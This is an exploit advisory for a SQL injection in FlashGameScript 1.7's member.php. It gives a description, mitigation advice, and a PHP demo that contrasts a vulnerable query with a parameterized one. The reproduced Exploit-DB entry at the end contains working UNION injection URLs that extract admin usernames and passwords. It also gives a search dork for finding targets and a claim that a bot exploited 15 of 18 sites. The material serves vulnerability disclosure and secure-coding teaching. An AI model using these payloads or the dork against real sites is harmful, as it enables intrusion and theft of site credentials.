Vendor: FlashGameScript
By: Xenduer77
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: FlashGameScript
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Year: 2007

FlashGameScript <= 1.7 (member.php)($user) SQL-Injection Exploit

This exploit allows an attacker to execute arbitrary SQL queries through the 'user' parameter handled by the 'member.php' file of FlashGameScript versions 1.7 and earlier. The parameter is passed straight into the query without being filtered or escaped, so a quote character in the input terminates the intended string literal and the remainder of the input is interpreted as SQL, allowing the attacker to manipulate the query and extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input (rejecting values outside the expected character set) before using it in SQL queries. In addition, using prepared statements or parameterized queries keeps the value separate from the SQL text, so that even unexpected input cannot change the structure of the query and SQL injection is prevented.
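As an added example (not FlashGameScript's own code and not taken from the advisory), the pattern described above is reconstructed hypothetically in PHP beside a hardened version that validates the parameter and binds it through a PDO prepared statement. The in-memory SQLite database, the members table layout and its rows are constructed for the demo and assume the pdo_sqlite extension.

```php
<?php
// Added example: hypothetical reconstruction of the flaw, not the real member.php.

// --- Vulnerable pattern (illustrative only; mirrors the description above) ---
function lookupMemberUnsafe(PDO $db, string $user): array
{
    // $user is interpolated straight into the SQL text, so a quote in the input
    // closes the string literal and the rest of the input becomes SQL.
    $sql = "SELECT username, user_type FROM members WHERE username = '{$user}'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened version: validate, then parameterize ---
function lookupMemberSafe(PDO $db, string $user): array
{
    // 1. Validation: a member name is limited to a conservative character set,
    //    which rejects quotes, comment sequences and whitespace outright.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user)) {
        throw new InvalidArgumentException('invalid user parameter');
    }
    // 2. Parameterization: the value is sent separately from the SQL text, so even
    //    a value that passes validation can never alter the query's structure.
    $stmt = $db->prepare('SELECT username, user_type FROM members WHERE username = :user');
    $stmt->execute([':user' => $user]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data (assumes pdo_sqlite); the table is a stand-in, not the product's schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (username TEXT, password TEXT, user_type INTEGER)');
$db->exec("INSERT INTO members VALUES ('alice', 'hash-a', 1), ('admin', 'hash-b', 2)");

// Input shaped like the advisory's payload: a quote ends the literal, UNION appends
// a second SELECT, and a comment swallows the trailing quote of the original query.
$injected = "' UNION SELECT username, password FROM members WHERE user_type=2 --";

// Unsafe: the appended SELECT returns rows the caller never asked for.
echo 'unsafe rows returned: ' . count(lookupMemberUnsafe($db, $injected)) . "\n";

// Safe: validation rejects the input before any SQL is executed.
try {
    lookupMemberSafe($db, $injected);
} catch (InvalidArgumentException $e) {
    echo "safe: {$e->getMessage()}\n";
}

// A legitimate lookup still works through the parameterized path.
print_r(lookupMemberSafe($db, 'alice'));
```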

Exploit-DB raw data:

###############################################
### FlashGameScript <= 1.7 (member.php)($user) SQL-Injection Exploit
###############################################
### Vulnerability Discovered By: Xenduer77
### ---July 7th, 2007
###############################################

{$user} Is passed straight to the query without being filtered.

###############################################
SQL-INJECTION:
###############################################

For Version 1.7:
-------
http://whatever.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/*

Prior To 1.7:
-------
http://whatever.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/*

### Tested by a bot on 18 sites, 15 were exploited.

###############################################

Dork: "Powered by FlashGameScript"

###############################################

# milw0rm.com [2007-07-08]